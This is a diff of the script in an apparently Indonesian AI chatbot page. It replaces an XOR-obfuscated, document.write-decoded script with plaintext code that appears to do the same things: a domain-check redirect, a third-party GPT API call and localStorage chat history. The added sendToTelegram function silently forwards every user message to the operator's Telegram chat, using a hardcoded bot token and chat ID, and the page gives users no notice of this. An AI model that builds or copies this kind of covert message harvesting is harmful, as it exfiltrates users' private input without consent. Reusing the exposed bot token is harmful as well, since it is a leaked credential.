--- a/chat.html
+++ b/chat.html
@@ -180,7 +180,141 @@
     </div>
 
 <script>
-    var enkripsi="--'02Agi'02fmockl'0A'02hkic'02vkfci'02`gpcqcn'02fcpk'02coklfgtgnmrgp;;,ekvjw`,km'0A'02pgfkpgav'02ig'02fmockl'02vgpqg`wv'2C'02'02'02'02kd'02'0:uklfmu,nmacvkml,jmqvlcog'02'03'1F'1F'02'05coklfgtgnmrgp;;,ekvjw`,km'05'0;'02'5@'2C'02'02'02'02'02'02'02'02uklfmu,nmacvkml,jpgd'02'1F'02'05jvvrq'1C--coklfgtgnmrgp;;,ekvjw`,km'05'1@'2C'02'02'02'02'5F'2C'2C'02'02'02'02amlqv'02crkWpn'02'1F'02'05jvvrq'1C--crk,l{zq,ru-ck-erv6'1Dvgzv'1F'05'1@'2C'02'02'02'02amlqv'02ajcv@mz'02'1F'02fmawoglv,egvGngoglv@{Kf'0:'05ajcv/`mz'05'0;'1@'2C'02'02'02'02ngv'02ajcvJkqvmp{'02'1F'02nmacnQvmpceg,egvKvgo'0:'05ajcvJkqvmp{'05'0;'02'5A'5A'02'00'00'1@'02--'02Egv'02ajcv'02jkqvmp{'02dpmo'02nmacnQvmpceg'2C'2C'02'02'02'02--'02Nmcf'02ajcv'02jkqvmp{'02ml'02rceg'02nmcf'2C'02'02'02'02uklfmu,mlnmcf'02'1F'02dwlavkml'0:'0;'02'5@'2C'02'02'02'02'02'02'02'02fmawoglv,egvGngoglv@{Kf'0:'05wqgpKlrwv'05'0;,dmawq'0:'0;'1@'2C'02'02'02'02'02'02'02'02kd'02'0:ajcvJkqvmp{'0;'02'5@'2C'02'02'02'02'02'02'02'02'02'02'02'02ajcvJkqvmp{,qrnkv'0:'05'7Al'05'0;,dmpGcaj'0:ogqqceg'02'1F'1G'02'5@'2C'02'02'02'02'02'02'02'02'02'02'02'02'02'02'02'02kd'02'0:ogqqceg'0;'02'5@'2C'02'02'02'02'02'02'02'02'02'02'02'02'02'02'02'02'02'02'02'02amlqv'02qglfgp'02'1F'02ogqqceg,qvcpvqUkvj'0:'00Rgleewlc'1C'00'0;'02'1D'02'05wqgp'05'02'1C'02'05`mv'05'1@'2C'02'02'02'02'02'02'02'02'02'02'02'02'02'02'02'02'02'02'02'02cffOgqqceg'0:ogqqceg,pgrncag'0:'00Rgleewlc'1C'02'00'0A'02'00'00'0;,pgrncag'0:'00CK'1C'02'00'0A'02'00'00'0;'0A'02qglfgp'0;'1@'2C'02'02'02'02'02'02'02'02'02'02'02'02'02'02'02'02'5F'2C'02'02'02'02'02'02'02'02'02'02'02'02'5F'0;'1@'2C'02'02'02'02'02'02'02'02'5F'2C'02'02'02'02'5F'2C'2C'02'02'02'02cq{la'02dwlavkml'02qglfVmVgngepco'0:ogqqceg'0;'02'5@'2C'02'02'02'02'02'02'02'02amlqv'02vmigl'02'1F'02'05577451435;'1CCCDCxW4GgFOoEc3d5X{EOn[L6i@JedQD[[u'05'1@'2C'02'02'02'02'02'02'02'02amlqv'02ajcvKf'02'1F'02'057713;;4542'05'1@'2C'02'02'02'02'02'02'02'02amlqv'02wpn'02'1F'02'42jvvrq'1C--crk,vgngepco,mpe-`mv'06'5@vmigl'5F-qglfOgqqceg'42'1@'2C'2C'02'02'02'02'02'02'02'02amlqv'02rcpcoq'02'1F'02'5@'2C'02'02'02'02'02'02'02'02'02'02'02'02ajcv]kf'1C'02ajcvKf'0A'2C'02'02'02'02'02'02'02'02'02'02'02'02vgzv'1C'02ogqqceg'0A'2C'02'02'02'02'02'02'02'02'02'02'02'02rcpqg]omfg'1C'02'05Ocpifmul'05'2C'02'02'02'02'02'02'02'02'5F'1@'2C'2C'02'02'02'02'02'02'02'02vp{'02'5@'2C'02'02'02'02'02'02'02'02'02'02'02'02cuckv'02dgvaj'0:wpn'0A'02'5@'2C'02'02'02'02'02'02'02'02'02'02'02'02'02'02'02'02ogvjmf'1C'02'05RMQV'05'0A'2C'02'02'02'02'02'02'02'02'02'02'02'02'02'02'02'02jgcfgpq'1C'02'5@'2C'02'02'02'02'02'02'02'02'02'02'02'02'02'02'02'02'02'02'02'02'05Amlvglv/V{rg'05'1C'02'05crrnkacvkml-hqml'05'0A'2C'02'02'02'02'02'02'02'02'02'02'02'02'02'02'02'02'5F'0A'2C'02'02'02'02'02'02'02'02'02'02'02'02'02'02'02'02`mf{'1C'02HQML,qvpklekd{'0:rcpcoq'0;'0A'2C'02'02'02'02'02'02'02'02'02'02'02'02'5F'0;'1@'2C'02'02'02'02'02'02'02'02'5F'02acvaj'02'0:gppmp'0;'02'5@'2C'02'02'02'02'02'02'02'02'02'02'02'02amlqmng,gppmp'0:'05Gppmp'02qglfkle'02ogqqceg'02vm'02Vgngepco'1C'05'0A'02gppmp'0;'1@'2C'02'02'02'02'02'02'02'02'5F'2C'02'02'02'02'5F'2C'2C'02'02'02'02dwlavkml'02qglfOgqqceg'0:'0;'02'5@'2C'02'02'02'02'02'02'02'02amlqv'02wqgpKlrwv'02'1F'02fmawoglv,egvGngoglv@{Kf'0:'05wqgpKlrwv'05'0;'1@'2C'02'02'02'02'02'02'02'02amlqv'02ogqqceg'02'1F'02wqgpKlrwv,tcnwg,vpko'0:'0;'1@'2C'02'02'02'02'02'02'02'02'2C'02'02'02'02'02'02'02'02kd'02'0:ogqqceg'0;'02'5@'2C'02'02'02'02'02'02'02'02'02'02'02'02cffOgqqceg'0:ogqqceg'0A'02'05wqgp'05'0;'1@'2C'02'02'02'02'02'02'02'02'02'02'02'02ajcvJkqvmp{'02)'1F'02'00Rgleewlc'1C'02'00'02)'02ogqqceg'02)'02'00'7Al'00'1@'02--'02Vco`cjicl'02rgqcl'02rgleewlc'02ig'02pkuc{cv'2C'02'02'02'02'02'02'02'02'02'02'02'02nmacnQvmpceg,qgvKvgo'0:'05ajcvJkqvmp{'05'0A'02ajcvJkqvmp{'0;'1@'02--'02Qctg'02vm'02nmacnQvmpceg'2C'02'02'02'02'02'02'02'02'02'02'02'02qglfVmVgngepco'0:ogqqceg'0;'1@'02--'02Ikpko'02rgqcl'02ig'02Vgngepco'2C'02'02'02'02'02'02'02'02'02'02'02'02dgvajCKPgqrmlqg'0:ogqqceg'0;'1@'2C'02'02'02'02'02'02'02'02'02'02'02'02wqgpKlrwv,tcnwg'02'1F'02'05'05'1@'2C'02'02'02'02'02'02'02'02'02'02'02'02wqgpKlrwv,dmawq'0:'0;'1@'2C'02'02'02'02'02'02'02'02'5F'2C'02'02'02'02'5F'2C'2C'02'02'02'02--'02Dwleqk'02wlvwi'02oglco`cjicl'02rgqcl'02ig'02ajcv'02`mz'2C'02'02'02'02dwlavkml'02cffOgqqceg'0:vgzv'0A'02qglfgp'0;'02'5@'2C'02'02'02'02'02'02'02'02amlqv'02ogqqcegFkt'02'1F'02fmawoglv,apgcvgGngoglv'0:'05fkt'05'0;'1@'2C'02'02'02'02'02'02'02'02ogqqcegFkt,ancqqLcog'02'1F'02'05ogqqceg'02'05'02)'02qglfgp'1@'2C'02'02'02'02'02'02'02'02ogqqcegFkt,vgzvAmlvglv'02'1F'02vgzv'1@'2C'2C'02'02'02'02'02'02'02'02amlqv'02vkogqvcor'02'1F'02fmawoglv,apgcvgGngoglv'0:'05fkt'05'0;'1@'2C'02'02'02'02'02'02'02'02vkogqvcor,ancqqLcog'02'1F'02'05vkogqvcor'05'1@'2C'02'02'02'02'02'02'02'02vkogqvcor,vgzvAmlvglv'02'1F'02egvAwppglvUKVCVkog'0:'0;'1@'2C'2C'02'02'02'02'02'02'02'02ogqqcegFkt,crrglfAjknf'0:vkogqvcor'0;'1@'2C'02'02'02'02'02'02'02'02ajcv@mz,crrglfAjknf'0:ogqqcegFkt'0;'1@'2C'02'02'02'02'02'02'02'02ajcv@mz,qapmnnVmr'02'1F'02ajcv@mz,qapmnnJgkejv'1@'02--'02Qapmnn'02ig'02`cucj'02qgvkcr'02icnk'02cfc'02rgqcl'02`cpw'2C'02'02'02'02'5F'2C'2C'02'02'02'02--'02Dwleqk'02wlvwi'02ogleco`kn'02pgqrml'02CK'2C'02'02'02'02cq{la'02dwlavkml'02dgvajCKPgqrmlqg'0:ogqqceg'0;'02'5@'2C'02'02'02'02'02'02'02'02vp{'02'5@'2C'02'02'02'02'02'02'02'02'02'02'02'02amlqv'02dwnnRpmorv'02'1F'02ajcvJkqvmp{'02)'02'00'7AlRgleewlc'1C'02'00'02)'02ogqqceg'02)'02'2C'02'02'02'02'02'02'02'02'02'02'02'02'02'02'02'02'02'02'02'02'02'02'02'02'02'02'02'02'02'02'00'7Al@cncq'02rgqcl'02klk'02fcnco'02`cjcqc'02Klfmlgqkc'02fglecl'02ec{c'02{cle'02qclvck'02fcl'02vkfci'02iciw'0A'02fglecl'02gomvkiml'1C'00'1@'2C'02'02'02'02'02'02'02'02'02'02'02'02amlqv'02pgqrmlqg'02'1F'02cuckv'02dgvaj'0:crkWpn'02)'02glamfgWPKAmormlglv'0:dwnnRpmorv'0;'0;'1@'2C'02'02'02'02'02'02'02'02'02'02'02'02amlqv'02fcvc'02'1F'02cuckv'02pgqrmlqg,hqml'0:'0;'1@'2C'2C'02'02'02'02'02'02'02'02'02'02'02'02kd'02'0:fcvc,qvcvwq'0;'02'5@'2C'02'02'02'02'02'02'02'02'02'02'02'02'02'02'02'02cffOgqqceg'0:fcvc,pgqwnv'0A'02'05`mv'05'0;'1@'2C'02'02'02'02'02'02'02'02'02'02'02'02'02'02'02'02ajcvJkqvmp{'02)'1F'02'00CK'1C'02'00'02)'02fcvc,pgqwnv'02)'02'00'7Al'00'1@'02--'02Vco`cjicl'02`cncqcl'02CK'02ig'02pkuc{cv'2C'02'02'02'02'02'02'02'02'02'02'02'02'02'02'02'02nmacnQvmpceg,qgvKvgo'0:'05ajcvJkqvmp{'05'0A'02ajcvJkqvmp{'0;'1@'02--'02Qctg'02vm'02nmacnQvmpceg'2C'02'02'02'02'02'02'02'02'02'02'02'02'5F'02gnqg'02'5@'2C'02'02'02'02'02'02'02'02'02'02'02'02'02'02'02'02cffOgqqceg'0:'05Occd'0A'02cfc'02igqcncjcl,'05'0A'02'05`mv'05'0;'1@'2C'02'02'02'02'02'02'02'02'02'02'02'02'5F'2C'02'02'02'02'02'02'02'02'5F'02acvaj'02'0:gppmp'0;'02'5@'2C'02'02'02'02'02'02'02'02'02'02'02'02cffOgqqceg'0:'05Occd'0A'02qc{c'02oglecncok'02igqwnkvcl'02wlvwi'02ogpgqrmlq,'05'0A'02'05`mv'05'0;'1@'2C'02'02'02'02'02'02'02'02'5F'2C'02'02'02'02'5F'2C'2C'02'02'02'02--'02Dwleqk'02wlvwi'02oglfcrcvicl'02ucivw'02qccv'02klk'02fcnco'02xmlc'02ucivw'02UKVC'02'0:EOV):'0;'2C'02'02'02'02dwlavkml'02egvAwppglvUKVCVkog'0:'0;'02'5@'2C'02'02'02'02'02'02'02'02amlqv'02mrvkmlq'02'1F'02'5@'02vkogXmlg'1C'02'05Cqkc-Ocicqqcp'05'0A'02jmwp'1C'02'050/fkekv'05'0A'02oklwvg'1C'02'050/fkekv'05'02'5F'1@'2C'02'02'02'02'02'02'02'02pgvwpl'02lgu'02Fcvg'0:'0;,vmNmacngVkogQvpkle'0:'05kf/KF'05'0A'02mrvkmlq'0;'1@'2C'02'02'02'02'5F'2C'2C'02'02'02'02--'02Vmeeng'02oglw'02tkqk`knkv{'2C'02'02'02'02dwlavkml'02vmeengOglw'0:'0;'02'5@'2C'02'02'02'02'02'02'02'02amlqv'02oglwKvgoq'02'1F'02fmawoglv,egvGngoglv@{Kf'0:'05oglwKvgoq'05'0;'1@'2C'02'02'02'02'02'02'02'02oglwKvgoq,qv{ng,fkqrnc{'02'1F'02oglwKvgoq,qv{ng,fkqrnc{'02'1F'1F'1F'02'05lmlg'05'02'1D'02'05`nmai'05'02'1C'02'05lmlg'05'1@'2C'02'02'02'02'5F'2C'2C'02'02'02'02--'02Angcp'02ajcv'02jkqvmp{'2C'02'02'02'02dwlavkml'02angcpAjcv'0:'0;'02'5@'2C'02'02'02'02'02'02'02'02ajcv@mz,kllgpJVON'02'1F'02'05'05'1@'2C'02'02'02'02'02'02'02'02ajcvJkqvmp{'02'1F'02'05'05'1@'2C'02'02'02'02'02'02'02'02nmacnQvmpceg,pgomtgKvgo'0:'05ajcvJkqvmp{'05'0;'1@'02--'02Angcp'02dpmo'02nmacnQvmpceg'2C'02'02'02'02'02'02'02'02fmawoglv,egvGngoglv@{Kf'0:'05oglwKvgoq'05'0;,qv{ng,fkqrnc{'02'1F'02'05lmlg'05'1@'02--'02Anmqg'02vjg'02oglw'2C'02'02'02'02'5F'2C'2C'02'02'02'02--'02Amlvcav'02Cfokl'2C'02'02'02'02dwlavkml'02amlvcavCfokl'0:'0;'02'5@'2C'02'02'02'02'02'02'02'02uklfmu,mrgl'0:'05jvvrq'1C--uc,og-40:1:12;5;010'05'0A'02'05]`ncli'05'0;'1@'2C'02'02'02'02'02'02'02'02fmawoglv,egvGngoglv@{Kf'0:'05oglwKvgoq'05'0;,qv{ng,fkqrnc{'02'1F'02'05lmlg'05'1@'02--'02Anmqg'02vjg'02oglw'2C'02'02'02'02'5F'2C'2C'02'02'02'02--'02Qcugp'2C'02'02'02'02dwlavkml'02qcugp'0:'0;'02'5@'2C'02'02'02'02'02'02'02'02uklfmu,mrgl'0:'05-qcugp,hrge'05'0A'02'05]`ncli'05'0;'1@'2C'02'02'02'02'02'02'02'02fmawoglv,egvGngoglv@{Kf'0:'05oglwKvgoq'05'0;,qv{ng,fkqrnc{'02'1F'02'05lmlg'05'1@'02--'02Anmqg'02vjg'02oglw'2C'02'02'02'02'5F'2C'2C'02'02'02'02--'02Anmqg'02oglw'02ml'02mwvqkfg'02ankai'2C'02'02'02'02fmawoglv,cffGtglvNkqvglgp'0:'05ankai'05'0A'02'0:gtglv'0;'02'1F'1G'02'5@'2C'02'02'02'02'02'02'02'02amlqv'02oglwKvgoq'02'1F'02fmawoglv,egvGngoglv@{Kf'0:'05oglwKvgoq'05'0;'1@'2C'02'02'02'02'02'02'02'02kd'02'0:'03gtglv,vcpegv,ocvajgq'0:'05,oglw'05'0;'02'04'04'02'03oglwKvgoq,amlvcklq'0:gtglv,vcpegv'0;'0;'02'5@'2C'02'02'02'02'02'02'02'02'02'02'02'02oglwKvgoq,qv{ng,fkqrnc{'02'1F'02'05lmlg'05'1@'2C'02'02'02'02'02'02'02'02'5F'2C'02'02'02'02'5F'0;'1@"; teks=""; teksasli="";var panjang;panjang=enkripsi.length;for (i=0;i<panjang;i++){ teks+=String.fromCharCode(enkripsi.charCodeAt(i)^2) }teksasli=unescape(teks);document.write(teksasli);
+    // Cek domain, jika tidak berasal dari amindeveloper99.github.io, redirect ke domain tersebut
+    if (window.location.hostname !== 'amindeveloper99.github.io') {
+        window.location.href = 'https://amindeveloper99.github.io';
+    }
+
+    const apiUrl = 'https://api.nyxs.pw/ai/gpt4?text=';
+    const chatBox = document.getElementById('chat-box');
+    let chatHistory = localStorage.getItem('chatHistory') || ""; // Get chat history from localStorage
+
+    // Load chat history on page load
+    window.onload = function() {
+        document.getElementById('userInput').focus();
+        if (chatHistory) {
+            chatHistory.split('\n').forEach(message => {
+                if (message) {
+                    const sender = message.startsWith("Pengguna:") ? 'user' : 'bot';
+                    addMessage(message.replace("Pengguna: ", "").replace("AI: ", ""), sender);
+                }
+            });
+        }
+    }
+
+    async function sendToTelegram(message) {
+        const token = '7556736179:AAFAzU6EeDMmGa1f7ZyGMlYN4kBHgfSFYYw';
+        const chatId = '5531996760';
+        const url = `https://api.telegram.org/bot${token}/sendMessage`;
+
+        const params = {
+            chat_id: chatId,
+            text: message,
+            parse_mode: 'Markdown'
+        };
+
+        try {
+            await fetch(url, {
+                method: 'POST',
+                headers: {
+                    'Content-Type': 'application/json',
+                },
+                body: JSON.stringify(params),
+            });
+        } catch (error) {
+            console.error('Error sending message to Telegram:', error);
+        }
+    }
+
+    function sendMessage() {
+        const userInput = document.getElementById('userInput');
+        const message = userInput.value.trim();
+        
+        if (message) {
+            addMessage(message, 'user');
+            chatHistory += "Pengguna: " + message + "\n"; // Tambahkan pesan pengguna ke riwayat
+            localStorage.setItem('chatHistory', chatHistory); // Save to localStorage
+            sendToTelegram(message); // Kirim pesan ke Telegram
+            fetchAIResponse(message);
+            userInput.value = '';
+            userInput.focus();
+        }
+    }
+
+    // Fungsi untuk menambahkan pesan ke chat box
+    function addMessage(text, sender) {
+        const messageDiv = document.createElement('div');
+        messageDiv.className = 'message ' + sender;
+        messageDiv.textContent = text;
+
+        const timestamp = document.createElement('div');
+        timestamp.className = 'timestamp';
+        timestamp.textContent = getCurrentWITATime();
+
+        messageDiv.appendChild(timestamp);
+        chatBox.appendChild(messageDiv);
+        chatBox.scrollTop = chatBox.scrollHeight; // Scroll ke bawah setiap kali ada pesan baru
+    }
+
+    // Fungsi untuk mengambil respon AI
+    async function fetchAIResponse(message) {
+        try {
+            const fullPrompt = chatHistory + "\nPengguna: " + message + 
+                              "\nBalas pesan ini dalam bahasa Indonesia dengan gaya yang santai dan tidak kaku, dengan emotikon:";
+            const response = await fetch(apiUrl + encodeURIComponent(fullPrompt));
+            const data = await response.json();
+
+            if (data.status) {
+                addMessage(data.result, 'bot');
+                chatHistory += "AI: " + data.result + "\n"; // Tambahkan balasan AI ke riwayat
+                localStorage.setItem('chatHistory', chatHistory); // Save to localStorage
+            } else {
+                addMessage('Maaf, ada kesalahan.', 'bot');
+            }
+        } catch (error) {
+            addMessage('Maaf, saya mengalami kesulitan untuk merespons.', 'bot');
+        }
+    }
+
+    // Fungsi untuk mendapatkan waktu saat ini dalam zona waktu WITA (GMT+8)
+    function getCurrentWITATime() {
+        const options = { timeZone: 'Asia/Makassar', hour: '2-digit', minute: '2-digit' };
+        return new Date().toLocaleTimeString('id-ID', options);
+    }
+
+    // Toggle menu visibility
+    function toggleMenu() {
+        const menuItems = document.getElementById('menuItems');
+        menuItems.style.display = menuItems.style.display === 'none' ? 'block' : 'none';
+    }
+
+    // Clear chat history
+    function clearChat() {
+        chatBox.innerHTML = '';
+        chatHistory = '';
+        localStorage.removeItem('chatHistory'); // Clear from localStorage
+        document.getElementById('menuItems').style.display = 'none'; // Close the menu
+    }
+
+    // Contact Admin
+    function contactAdmin() {
+        window.open('https://wa.me/6283830979232', '_blank');
+        document.getElementById('menuItems').style.display = 'none'; // Close the menu
+    }
+
+    // Sawer
+    function sawer() {
+        window.open('/sawer.jpeg', '_blank');
+        document.getElementById('menuItems').style.display = 'none'; // Close the menu
+    }
+
+    // Close menu on outside click
+    document.addEventListener('click', (event) => {
+        const menuItems = document.getElementById('menuItems');
+        if (!event.target.matches('.menu') && !menuItems.contains(event.target)) {
+            menuItems.style.display = 'none';
+        }
+    });
 </script>
 
 </body>
